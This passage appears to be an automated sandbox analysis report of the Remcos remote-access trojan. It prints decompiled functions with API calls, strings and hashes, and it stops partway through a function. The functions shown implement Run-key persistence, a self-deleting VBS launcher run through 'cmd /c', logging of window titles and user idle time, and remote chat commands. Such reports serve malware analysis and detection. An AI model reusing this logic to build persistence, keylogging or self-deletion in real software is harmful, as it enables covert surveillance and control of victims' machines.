                    						 *_t190 = _t263;
                    						 *((intOrPtr*)(E0043A504())) = 0x18;
                    						goto L2;
                    					}
                    				} else {
                    					 *(E0043A4F1()) =  *_t188 & 0x00000000;
                    					 *_a8 = _t263;
                    					L2:
                    					return  *((intOrPtr*)(E0043A504()));
                    				}
                    			}

                    APIs
                      • Part of subcall function 0044EF23: CreateFileW.KERNEL32(00000000,00000000,?,0044F2FE,?,?,00000000,?,0044F2FE,00000000,0000000C), ref: 0044EF40
                    • GetLastError.KERNEL32 ref: 0044F369
                    • __dosmaperr.LIBCMT ref: 0044F370
                    • GetFileType.KERNEL32(00000000), ref: 0044F37C
                    • GetLastError.KERNEL32 ref: 0044F386
                    • __dosmaperr.LIBCMT ref: 0044F38F
                    • CloseHandle.KERNEL32(00000000), ref: 0044F3AF
                    • CloseHandle.KERNEL32(?), ref: 0044F4F9
                    • GetLastError.KERNEL32 ref: 0044F52B
                    • __dosmaperr.LIBCMT ref: 0044F532
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                    • String ID: H
                    • API String ID: 4237864984-2852464175
                    • Opcode ID: 47bb2141c220456fdb7a8c8012237244b82838329f6a58beebc578ef5c24065f
                    • Instruction ID: 8387d8c7474957efea47537ed2c3f831a95fafc38b1db0bb8119202e772c3410
                    • Opcode Fuzzy Hash: 47bb2141c220456fdb7a8c8012237244b82838329f6a58beebc578ef5c24065f
                    • Instruction Fuzzy Hash: 18A15A32A105489FEF19DF68D8417AE7BA0EB06324F14016EF801DB392DB799D16CB5A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 94%
                    			E1059BBF2() {
                    				char _v28;
                    				char _v52;
                    				char _v76;
                    				char _v100;
                    				char _v124;
                    				char _v148;
                    				short _v668;
                    				void* _t49;
                    				void* _t50;
                    				void* _t53;
                    				void* _t56;
                    				void* _t82;
                    				void* _t84;
                    				void* _t85;
                    				signed char _t123;
                    				signed char _t124;
                    				intOrPtr* _t219;
                    
                    				E105A0FC9();
                    				if( *0x46a9d4 != 0x30) {
                    					E1059ABE1();
                    				}
                    				_t227 =  *0x46bd6b - 1;
                    				if( *0x46bd6b == 1) {
                    					E105A61EC(_t227);
                    				}
                    				if( *0x46ba75 != 0) {
                    					E105A85C2(E10592D59(0x46c0e0));
                    				}
                    				if( *0x46bb02 == 1) {
                    					E105A1BCA(0x80000001, 0x45ff08, E10592D59(0x46c4e8));
                    				}
                    				if( *0x46bafb == 1) {
                    					E105A1BCA(0x80000002, 0x45ff08, E10592D59(0x46c4e8));
                    				}
                    				if( *0x46bb00 == 1) {
                    					E105A1BCA(0x80000002, 0x45ff68, E10592D59(0x46c4e8));
                    				}
                    				E105C2D6E(0,  &_v668, 0, 0x208);
                    				_t49 = E105932F7();
                    				_t50 = E10592E03(0x46c560);
                    				_t53 = E105A189E(E10592E03(0x46c518), 0x460190,  &_v668, 0x208, _t50, _t49);
                    				_t232 = _t53;
                    				if(_t53 == 0) {
                    					GetModuleFileNameW(0,  &_v668, 0x208);
                    				}
                    				RegDeleteKeyA(0x80000001, E10592E03(0x46c518));
                    				_t56 = E10598352(_t232);
                    				_t219 =  *0x453238;
                    				_t233 = _t56;
                    				if(_t56 != 0) {
                    					 *_t219(E10592D59(0x46c530), 0x80);
                    				}
                    				_t123 =  ~( *_t219( &_v668, 0x80));
                    				asm("sbb bl, bl");
                    				E10593F14(_t123,  &_v148, E105A8148( &_v76, E105A7F01( &_v28)), 0, _t233, 0x460198);
                    				E10592D5E();
                    				E10592E35();
                    				E10595297(_t123,  &_v124, E10593F14(_t123,  &_v28, E105950ED(_t123,  &_v76, E105CA6ED(_t123,  &_v28, _t233, 0x460008)), 0, _t233, 0x45f948), _t233,  &_v148);
                    				E10592D5E();
                    				E10592D5E();
                    				E10595273(_t123,  &_v52, 0x4601a4, _t233, E105950ED(_t123,  &_v28, 0x460040));
                    				E10592D5E();
                    				_t124 = _t123 & 0x00000001;
                    				_t234 = _t124;
                    				if(_t124 != 0) {
                    					E1059417F(E10593F14(_t124,  &_v28, E10595273(_t124,  &_v76, 0x4601d8, _t234, E105950ED(_t124,  &_v100,  &_v668)), 0, _t234, 0x4601d0));
                    					E10592D5E();
                    					E10592D5E();
                    					E10592D5E();
                    				}
                    				E1059417F(E10593F14(_t124,  &_v100, E10593F14(_t124,  &_v28, E105950ED(_t124,  &_v76, 0x460210), 0, _t234,  &_v668), 0, _t234, 0x460208));
                    				E10592D5E();
                    				E10592D5E();
                    				E10592D5E();
                    				_t235 = _t124;
                    				if(_t124 != 0) {
                    					E105984DA(_t124,  &_v52, 0, 0x460234);
                    				}
                    				_t82 = E10598352(_t235);
                    				_t236 = _t82;
                    				if(_t82 != 0) {
                    					E1059417F(E10593F14(0x45f724,  &_v100, E1059ACD7( &_v28, 0x460240, _t236, 0x46c530), 0, _t236, 0x460208));
                    					E10592D5E();
                    					E10592D5E();
                    				}
                    				E105984DA(0x45f724,  &_v52, 0, 0x460140);
                    				_t84 = E10592D59( &_v124);
                    				_t85 = E105932F7();
                    				if(E105A87B5(E10592D59( &_v52), _t85 + _t85, _t84, 0) != 0) {
                    					ShellExecuteW(0, 0x45f6e4, E10592D59( &_v124), 0x45f724, 0x45f724, 0);
                    				}
                    				ExitProcess(0);
                    			}

                    APIs
                      • Part of subcall function 105A0FC9: TerminateProcess.KERNEL32(00000000,?,1059BC03), ref: 105A0FD9
                      • Part of subcall function 105A0FC9: WaitForSingleObject.KERNEL32(000000FF,?,1059BC03), ref: 105A0FEC
                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 1059BCFC
                    • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 1059BD0F
                      • Part of subcall function 1059ABE1: DeleteFileW.KERNEL32(00000000,?,?,1059BC11), ref: 1059ABB1
                      • Part of subcall function 1059ABE1: RemoveDirectoryW.KERNEL32(00000000,?,?,1059BC11), ref: 1059ABD6
                      • Part of subcall function 1059ABE1: TerminateThread.KERNEL32(0040884B,00000000,?,1059BC11), ref: 1059ABF0
                      • Part of subcall function 1059ABE1: UnhookWindowsHookEx.USER32(0046C350), ref: 1059AC00
                      • Part of subcall function 1059ABE1: TerminateThread.KERNEL32(00408830,00000000,?,1059BC11), ref: 1059AC12
                    • ShellExecuteW.SHELL32(00000000,0045F6E4,00000000,0045F724,0045F724,00000000), ref: 1059BF42
                    • ExitProcess.KERNEL32 ref: 1059BF49
                    Strings
                    • Remcos, xrefs: 1059BC3B
                    • fso.DeleteFolder ", xrefs: 1059BEC4
                    • while fso.FileExists(", xrefs: 1059BE0C
                    • Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 1059BC40
                    • On Error Resume Next, xrefs: 1059BDDC
                    • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 1059BC8F
                    Memory Dump Source
                    • Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: Terminate$DeleteFileProcessThread$DirectoryExecuteExitHookModuleNameObjectRemoveShellSingleUnhookWaitWindows
                    • String ID: On Error Resume Next$Remcos$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$fso.DeleteFolder "$while fso.FileExists("
                    • API String ID: 4014257804-1409672675
                    • Opcode ID: 5203026b9e9c351e5864ac0f5871ac187740bbe2731bbf21f0ac6fd14bb0fb7f
                    • Instruction ID: c57f736de2034e813b58f9943e6fa6ba2b6b81f3ffdfcf8da731ca81bdf300e9
                    • Opcode Fuzzy Hash: 5203026b9e9c351e5864ac0f5871ac187740bbe2731bbf21f0ac6fd14bb0fb7f
                    • Instruction Fuzzy Hash: 12819239A002089ADB05EBA0DC9AEFF7F69EF90640F14406EF406671A1FE647D4BC795
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 89%
                    			E00409195(void* __ecx, void* __edx) {
                    				char _v28;
                    				char _v56;
                    				char _v76;
                    				char _v80;
                    				char _v100;
                    				void* _v104;
                    				char _v108;
                    				char _v112;
                    				struct HWND__* _v116;
                    				void* __ebx;
                    				void* __edi;
                    				int _t36;
                    				struct HWND__* _t42;
                    				void* _t50;
                    				int _t57;
                    				struct HWND__* _t77;
                    				void* _t119;
                    				signed int _t125;
                    				void* _t127;
                    
                    				_t112 = __edx;
                    				_t127 = (_t125 & 0xfffffff8) - 0x74;
                    				_push(_t77);
                    				_push(0xea60);
                    				_t119 = __ecx;
                    				while( *((char*)(_t119 + 0x49)) != 0 ||  *((char*)(_t119 + 0x4a)) != 0) {
                    					Sleep(0x1f4);
                    					_t77 = GetForegroundWindow();
                    					_t36 = GetWindowTextLengthW(_t77);
                    					_t4 = _t36 + 1; // 0x1
                    					E00409DEC(_t77,  &_v100, _t112, _t119, _t4, 0);
                    					if(_t36 != 0) {
                    						_t57 = E00402489();
                    						GetWindowTextW(_t77, E00401EEB( &_v100), _t57);
                    						_t112 = 0x46dd0c;
                    						if(E00409EAC(0x46dd0c) == 0) {
                    							E00409DD2(0x46dd0c,  &_v100);
                    							E0040733F(E00402489() - 1);
                    							_t127 = _t127 - 0x18;
                    							_t136 =  *0x46c39b;
                    							if( *0x46c39b == 0) {
                    								_t112 = E00409E69( &_v76, L"\r\n[ ", __eflags,  &_v108);
                    								E004030A6(_t77, _t127, _t67, _t119, __eflags, L" ]\r\n");
                    								E00408B80(_t119);
                    								E00401EF0();
                    							} else {
                    								E00407350(_t77, _t127, 0x46dd0c, _t136,  &_v108);
                    								E00409634(_t77, _t119, _t136);
                    							}
                    						}
                    					}
                    					_t83 = _t119;
                    					E00409C15(_t119);
                    					if(E004171D6(_t119) < 0xea60) {
                    						L18:
                    						E00401EF0();
                    						continue;
                    					} else {
                    						_t77 = _v116;
                    						while( *((char*)(_t119 + 0x49)) != 0 ||  *((char*)(_t119 + 0x4a)) != 0) {
                    							_t42 = E004171D6(_t83);
                    							if(_t42 < 0xea60) {
                    								__eflags = _t77 % 0xea60;
                    								E0043BACE(_t83, _t77 / 0xea60,  &_v112, 0xa);
                    								_t50 = E00405343(_t77,  &_v80, E004075C2(_t77,  &_v56, "\r\n{ User has been idle for ", _t119, __eflags, E00402084(_t77,  &_v28,  &_v112)), _t119, __eflags, " minutes }\r\n");
                    								_t127 = _t127 + 0xc - 0x14;
                    								_t112 = _t50;
                    								E004172DA(_t127, _t50);
                    								E00408B80(_t119);
                    								E00401FC7();
                    								E00401FC7();
                    								E00401FC7();
                    								goto L18;
                    							}
                    							_t77 = _t42;
                    							_v116 = _t77;
                    							Sleep(0x3e8);
                    						}
                    						E00401EF0();
                    						break;
                    					}
                    				}
                    				__eflags = 0;
                    				return 0;
                    			}

                    APIs
                    • __Init_thread_footer.LIBCMT ref: 004091F7
                    • Sleep.KERNEL32(000001F4), ref: 00409202
                    • GetForegroundWindow.USER32 ref: 00409208
                    • GetWindowTextLengthW.USER32(00000000), ref: 00409211
                    • GetWindowTextW.USER32 ref: 00409245
                    • Sleep.KERNEL32(000003E8), ref: 00409313
                      • Part of subcall function 00409E69: char_traits.LIBCPMT ref: 00409E79
                      • Part of subcall function 00408B80: SetEvent.KERNEL32(?,?,?,?,00409CFC,?,?,?,?,?,00000000), ref: 00408BAD
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: Window$SleepText$EventForegroundInit_thread_footerLengthchar_traits
                    • String ID: [ ${ User has been idle for $ ]$ minutes }
                    • API String ID: 107669343-3343415809
                    • Opcode ID: 5208e0e58cc42efc71676e40296c05a26964b477c59cb947b62b6e083ccbcc4a
                    • Instruction ID: 503b2ce70374cf4332f5393007fb2740c98398301deed75f23da1ef1a57f7c11
                    • Opcode Fuzzy Hash: 5208e0e58cc42efc71676e40296c05a26964b477c59cb947b62b6e083ccbcc4a
                    • Instruction Fuzzy Hash: A251D3716082415BC314FB25D846A6E77A5AF84348F44093FF842A62E3EF7C9E45C69E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0040B488(void* __ebx, void* __eflags) {
                    				char _v28;
                    				char _v52;
                    				char _v76;
                    				char _v100;
                    				char _v124;
                    				char _v148;
                    				char _v172;
                    				char _v196;
                    				short _v716;
                    				void* __edi;
                    				void* __ebp;
                    				void* _t36;
                    				void* _t37;
                    				void* _t40;
                    				void* _t54;
                    				void* _t67;
                    				void* _t68;
                    				void* _t79;
                    
                    				_t79 = __ebx;
                    				E0041015B();
                    				_t36 = E00402489();
                    				_t37 = E00401F95(0x46c560);
                    				_t40 = E00410A30(E00401F95(0x46c518), "exepath",  &_v716, 0x208, _t37, _t36);
                    				_t140 = _t40;
                    				if(_t40 == 0) {
                    					GetModuleFileNameW(0,  &_v716, 0x208);
                    				}
                    				E004030A6(_t79,  &_v124, E004172DA( &_v52, E00417093( &_v76)), 0, _t140, L".vbs");
                    				E00401EF0();
                    				E00401FC7();
                    				E00404429(_t79,  &_v100, E004030A6(_t79,  &_v76, E0040427F(_t79,  &_v52, E0043987F(_t79,  &_v76, _t140, L"Temp")), 0, _t140, "\\"), _t140,  &_v124);
                    				E00401EF0();
                    				E00401EF0();
                    				E00401F6D(_t79,  &_v28);
                    				_t54 = E0040427F(_t79,  &_v196, L"\"\"\", 0");
                    				E00403311(E004030A6(_t79,  &_v76, E00403030( &_v52, E004030A6(_t79,  &_v148, E0040427F(_t79,  &_v172, L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\""), 0, _t140,  &_v716), _t54), 0, _t140, "\n"));
                    				E00401EF0();
                    				E00401EF0();
                    				E00401EF0();
                    				E00401EF0();
                    				E00401EF0();
                    				E0040766C(_t79,  &_v28, 0, L"CreateObject(\"Scripting.FileSystemObject\").DeleteFile(Wscript.ScriptFullName)");
                    				_t67 = E00401EEB( &_v100);
                    				_t68 = E00402489();
                    				if(E00417947(E00401EEB( &_v28), _t68 + _t68, _t67, 0) != 0 && ShellExecuteW(0, L"open", E00401EEB( &_v100), 0x45f724, 0x45f724, 0) > 0x20) {
                    					ExitProcess(0);
                    				}
                    				E00401EF0();
                    				E00401EF0();
                    				return E00401EF0();
                    			}

                    APIs
                      • Part of subcall function 0041015B: TerminateProcess.KERNEL32(00000000,0046C500,0040D1DC), ref: 0041016B
                      • Part of subcall function 0041015B: WaitForSingleObject.KERNEL32(000000FF), ref: 0041017E
                      • Part of subcall function 00410A30: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,0046C518), ref: 00410A4C
                      • Part of subcall function 00410A30: RegQueryValueExA.KERNELBASE(00000000,00000000,00000000,00000000,00000208,?), ref: 00410A65
                      • Part of subcall function 00410A30: RegCloseKey.KERNELBASE(00000000), ref: 00410A70
                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040B4E2
                    • ShellExecuteW.SHELL32(00000000,open,00000000,0045F724,0045F724,00000000), ref: 0040B641
                    • ExitProcess.KERNEL32 ref: 0040B64D
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                    • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                    • API String ID: 1913171305-2411266221
                    • Opcode ID: cb740de2307435e99b1296b2d4ab56f0759c9049fa38ebb65609f6a5db18dc5a
                    • Instruction ID: 1eb9c9899973781d748da32130d6708d7247d8467cae5aa57bbac03f0cab9b6b
                    • Opcode Fuzzy Hash: cb740de2307435e99b1296b2d4ab56f0759c9049fa38ebb65609f6a5db18dc5a
                    • Instruction Fuzzy Hash: C74150319101185ACB14FB61DC92DEE7779AF60748F10007FF806721E2EF385E4ACA99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E105C63F8(void* __edx, void* __eflags, char* _a4, int _a8, char* _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                    				int _v8;
                    				int _v12;
                    				char _v16;
                    				intOrPtr _v24;
                    				char _v28;
                    				void* __ebx;
                    				char* _t31;
                    				int _t35;
                    				int _t43;
                    				void* _t51;
                    				int _t52;
                    				int _t54;
                    				void* _t56;
                    				void* _t63;
                    				short* _t64;
                    				short* _t67;
                    
                    				_t62 = __edx;
                    				E105C6375(_t51,  &_v28, __edx, _a24);
                    				_t52 = 0;
                    				_t54 =  *(_v24 + 0x14);
                    				_t31 = _a4;
                    				_v8 = _t54;
                    				if(_t31 == 0) {
                    					L4:
                    					 *((intOrPtr*)(E105CB372())) = 0x16;
                    					E105C77CB();
                    					L18:
                    					if(_v16 != 0) {
                    						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
                    					}
                    					return _t52;
                    				}
                    				_t66 = _a8;
                    				if(_a8 == 0) {
                    					goto L4;
                    				}
                    				 *_t31 = 0;
                    				if(_a12 == 0 || _a16 == 0) {
                    					goto L4;
                    				} else {
                    					_t35 = MultiByteToWideChar(_t54, 0, _a12, 0xffffffff, 0, 0);
                    					_v12 = _t35;
                    					if(_t35 != 0) {
                    						_t64 = E105D07FA(_t54, _t35 + _t35);
                    						_t56 = _t63;
                    						if(_t64 != 0) {
                    							if(MultiByteToWideChar(_v8, 0, _a12, 0xffffffff, _t64, _v12) != 0) {
                    								_t67 = E105D07FA(_t56, _t66 + _t66);
                    								if(_t67 != 0) {
                    									_t43 = E105D22C1(0, _t62, _t67, _a8, _t64, _a16, _a20, _a24);
                    									_v12 = _t43;
                    									if(_t43 != 0) {
                    										if(WideCharToMultiByte(_v8, 0, _t67, 0xffffffff, _a4, _a8, 0, 0) != 0) {
                    											_t52 = _v12;
                    										} else {
                    											E105CB33C(GetLastError());
                    										}
                    									}
                    								}
                    								E105D1063(_t67);
                    							} else {
                    								E105CB33C(GetLastError());
                    							}
                    						}
                    						E105D1063(_t64);
                    					} else {
                    						E105CB33C(GetLastError());
                    					}
                    					goto L18;
                    				}
                    			}

                    APIs
                    • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,10592BA7,?,00000050,0045F3F0,00000000), ref: 105C6450
                    • GetLastError.KERNEL32(?,?,10592BA7,?,00000050,0045F3F0,00000000), ref: 105C645D
                    • __dosmaperr.LIBCMT ref: 105C6464
                    • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,10592BA7,?,00000050,0045F3F0,00000000), ref: 105C6490
                    • GetLastError.KERNEL32(?,?,?,10592BA7,?,00000050,0045F3F0,00000000), ref: 105C649A
                    • __dosmaperr.LIBCMT ref: 105C64A1
                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,0045F3F0,00000000,00000000,?,?,?,?,?,?,10592BA7,?), ref: 105C64E4
                    • GetLastError.KERNEL32(?,?,?,?,?,?,10592BA7,?,00000050,0045F3F0,00000000), ref: 105C64EE
                    • __dosmaperr.LIBCMT ref: 105C64F5
                    • _free.LIBCMT ref: 105C6501
                    • _free.LIBCMT ref: 105C6508
                    Memory Dump Source
                    • Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                    • String ID:
                    • API String ID: 2441525078-0
                    • Opcode ID: 849a0d04bf410f1f8ab15d7300547c3a5578a558c251933ff8797b2c56f23ee6
                    • Instruction ID: 50f79a3861f4bfad757b3aa55b9e08da3b7bec0e35f148b6833979d99431d741
                    • Opcode Fuzzy Hash: 849a0d04bf410f1f8ab15d7300547c3a5578a558c251933ff8797b2c56f23ee6
                    • Instruction Fuzzy Hash: 5D31927580424ABFDF015FE4CD89A9F3F6CEF496A1F600165F81056290DB31EA11DB71
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0043558A(void* __edx, void* __eflags, char* _a4, int _a8, char* _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                    				int _v8;
                    				int _v12;
                    				char _v16;
                    				intOrPtr _v24;
                    				char _v28;
                    				void* __ebx;
                    				char* _t31;
                    				int _t35;
                    				int _t43;
                    				void* _t51;
                    				int _t52;
                    				int _t54;
                    				void* _t56;
                    				void* _t63;
                    				short* _t64;
                    				short* _t67;
                    
                    				_t62 = __edx;
                    				E00435507(_t51,  &_v28, __edx, _a24);
                    				_t52 = 0;
                    				_t54 =  *(_v24 + 0x14);
                    				_t31 = _a4;
                    				_v8 = _t54;
                    				if(_t31 == 0) {
                    					L4:
                    					 *((intOrPtr*)(E0043A504())) = 0x16;
                    					E0043695D();
                    					L18:
                    					if(_v16 != 0) {
                    						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
                    					}
                    					return _t52;
                    				}
                    				_t66 = _a8;
                    				if(_a8 == 0) {
                    					goto L4;
                    				}
                    				 *_t31 = 0;
                    				if(_a12 == 0 || _a16 == 0) {
                    					goto L4;
                    				} else {
                    					_t35 = MultiByteToWideChar(_t54, 0, _a12, 0xffffffff, 0, 0);
                    					_v12 = _t35;
                    					if(_t35 != 0) {
                    						_t64 = E0043F98C(_t54, _t35 + _t35);
                    						_t56 = _t63;
                    						if(_t64 != 0) {
                    							if(MultiByteToWideChar(_v8, 0, _a12, 0xffffffff, _t64, _v12) != 0) {
                    								_t67 = E0043F98C(_t56, _t66 + _t66);
                    								if(_t67 != 0) {
                    									_t43 = E00441453(0, _t62, _t67, _a8, _t64, _a16, _a20, _a24);
                    									_v12 = _t43;
                    									if(_t43 != 0) {
                    										if(WideCharToMultiByte(_v8, 0, _t67, 0xffffffff, _a4, _a8, 0, 0) != 0) {
                    											_t52 = _v12;
                    										} else {
                    											E0043A4CE(GetLastError());
                    										}
                    									}
                    								}
                    								E004401F5(_t67);
                    							} else {
                    								E0043A4CE(GetLastError());
                    							}
                    						}
                    						E004401F5(_t64);
                    					} else {
                    						E0043A4CE(GetLastError());
                    					}
                    					goto L18;
                    				}
                    			}

                    APIs
                    • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D39,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004355E2
                    • GetLastError.KERNEL32(?,?,00401D39,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004355EF
                    • __dosmaperr.LIBCMT ref: 004355F6
                    • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D39,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00435622
                    • GetLastError.KERNEL32(?,?,?,00401D39,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043562C
                    • __dosmaperr.LIBCMT ref: 00435633
                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D39,?), ref: 00435676
                    • GetLastError.KERNEL32(?,?,?,?,?,?,00401D39,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00435680
                    • __dosmaperr.LIBCMT ref: 00435687
                    • _free.LIBCMT ref: 00435693
                    • _free.LIBCMT ref: 0043569A
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                    • String ID:
                    • API String ID: 2441525078-0
                    • Opcode ID: af4fff882a718f2a0465fbb3afeaba3fd683e49890623f651a00384afc978380
                    • Instruction ID: b5d46763a30f5c02a0768ec9d988a2018c1f619f389f5c820b1df77af5e22da9
                    • Opcode Fuzzy Hash: af4fff882a718f2a0465fbb3afeaba3fd683e49890623f651a00384afc978380
                    • Instruction Fuzzy Hash: 9F314A71400A0ABFDF01AFA5CC46DAF7B78EF08365F10416AF91896291DB39CD21CB69
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 76%
                    			E1059625B(char* __edx, void* __eflags, intOrPtr _a4) {
                    				struct tagMSG _v52;
                    				void* _v56;
                    				char _v60;
                    				char _v76;
                    				char _v80;
                    				char _v84;
                    				char _v104;
                    				char _v108;
                    				void* _v112;
                    				char _v116;
                    				char _v120;
                    				char _v140;
                    				void* _v176;
                    				void* __ebx;
                    				void* __ebp;
                    				intOrPtr* _t28;
                    				char* _t36;
                    				intOrPtr _t46;
                    				void* _t57;
                    				intOrPtr _t69;
                    				void* _t111;
                    				void* _t113;
                    				void* _t115;
                    				signed int _t117;
                    				void* _t120;
                    				void* _t121;
                    				void* _t122;
                    				void* _t123;
                    
                    				_t125 = __eflags;
                    				_t101 = __edx;
                    				_t69 = _a4;
                    				E10592F5A(_t69,  &_v104, __edx, __eflags, _t69 + 0x1c);
                    				SetEvent( *(_t69 + 0x34));
                    				_t28 = E10592E03( &_v108);
                    				E10595114( &_v108,  &_v60, 4, 0xffffffff);
                    				_t120 = (_t117 & 0xfffffff8) - 0x5c;
                    				E10592F5A(_t69, _t120, _t101, _t125, 0x46c238);
                    				_t121 = _t120 - 0x18;
                    				E10592F5A(_t69, _t121, _t101, _t125,  &_v76);
                    				E105A82E6( &_v140, _t101);
                    				_t122 = _t121 + 0x30;
                    				_t111 =  *_t28 - 0x3a;
                    				if(_t111 == 0) {
                    					E10592CB7( &_v116, _t101, __eflags, 0);
                    					_t36 = E105932F7();
                    					E10592E03(E10592CB7( &_v120, _t101, __eflags, 0));
                    					_t101 = _t36;
                    					_t113 = E105A0509();
                    					__eflags = _t113;
                    					if(_t113 == 0) {
                    						L7:
                    						E10592CE2( &_v116, _t101);
                    						E10592E35();
                    						E10592E35();
                    						__eflags = 0;
                    						return 0;
                    					}
                    					 *0x46baec = E105A079F(_t113, 0x45f690);
                    					 *0x46bae4 = E105A079F(_t113, 0x45f6a0);
                    					_t46 = E105A079F(_t113, 0x45f6ac);
                    					_t123 = _t122 - 0x18;
                    					 *0x46bae8 = _t46;
                    					 *0x46bae1 = 1;
                    					E10592F5A(_t69, _t123, 0x45f6ac, __eflags, 0x46c2b8);
                    					_push(0x74);
                    					E10595912(_t69, _t69, 0x45f6ac, __eflags);
                    					L10:
                    					_t115 = HeapCreate(0, 0, 0);
                    					__eflags =  *0x46bae4(_t115,  &_v140);
                    					if(__eflags != 0) {
                    						_t123 = _t123 - 0x18;
                    						E10592F19(_t69, _t123, 0x45f6ac, __eflags, _v140, _t51);
                    						_push(0x3b);
                    						E10595912(_t69, _t69, 0x45f6ac, __eflags);
                    						HeapFree(_t115, 0, _v176);
                    					}
                    					goto L10;
                    				}
                    				_t127 = _t111 != 1;
                    				if(_t111 != 1) {
                    					goto L7;
                    				}
                    				_t57 =  *0x46baec(E10592E03(E10592CB7( &_v116, _t101, _t127, 0)));
                    				_t128 = _t57;
                    				if(_t57 == 0) {
                    					goto L7;
                    				}
                    				E105950ED(_t69,  &_v80, 0x45f6b8);
                    				_t101 =  &_v84;
                    				E105A820A(_t69, _t122 - 0x18,  &_v84);
                    				_push(0x3b);
                    				E10595912(_t69, _t69,  &_v84, _t128);
                    				E10592D5E();
                    				L4:
                    				while(GetMessageA( &_v52, 0, 0, 0) > 0) {
                    					TranslateMessage( &_v52);
                    					DispatchMessageA( &_v52);
                    				}
                    				if(__eflags < 0) {
                    					goto L4;
                    				}
                    				goto L7;
                    			}

                    APIs
                    • SetEvent.KERNEL32(?,?), ref: 1059627A
                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 1059632A
                    • TranslateMessage.USER32(?), ref: 10596339
                    • DispatchMessageA.USER32(?), ref: 10596344
                    • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,0046C2B8), ref: 105963FC
                    • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 10596434
                      • Part of subcall function 10595912: send.WS2_32(?,00000000,00000000,00000000), ref: 10595986
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                    • String ID: CloseChat$DisplayMessage$GetMessage
                    • API String ID: 2956720200-749203953
                    • Opcode ID: ac4b965a3e5c8c83acfcbb71ef94e7850c6652e83b6f7e3158117b90bf42ec15
                    • Instruction ID: 1f382abc42fdf3881bac4205ed5a664fe3ebf5898ea7114ec5691bf6ed648b68
                    • Opcode Fuzzy Hash: ac4b965a3e5c8c83acfcbb71ef94e7850c6652e83b6f7e3158117b90bf42ec15
                    • Instruction Fuzzy Hash: 4A41803A604301ABCB04EB74DC5A96F7FA8EBC5751F40092DF94293191EF34EA1AC796
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 76%
                    			E004053ED(char* __edx, void* __eflags, intOrPtr _a4) {
                    				struct tagMSG _v52;
                    				void* _v56;
                    				char _v60;
                    				char _v76;
                    				char _v80;
                    				char _v84;
                    				char _v104;
                    				char _v108;
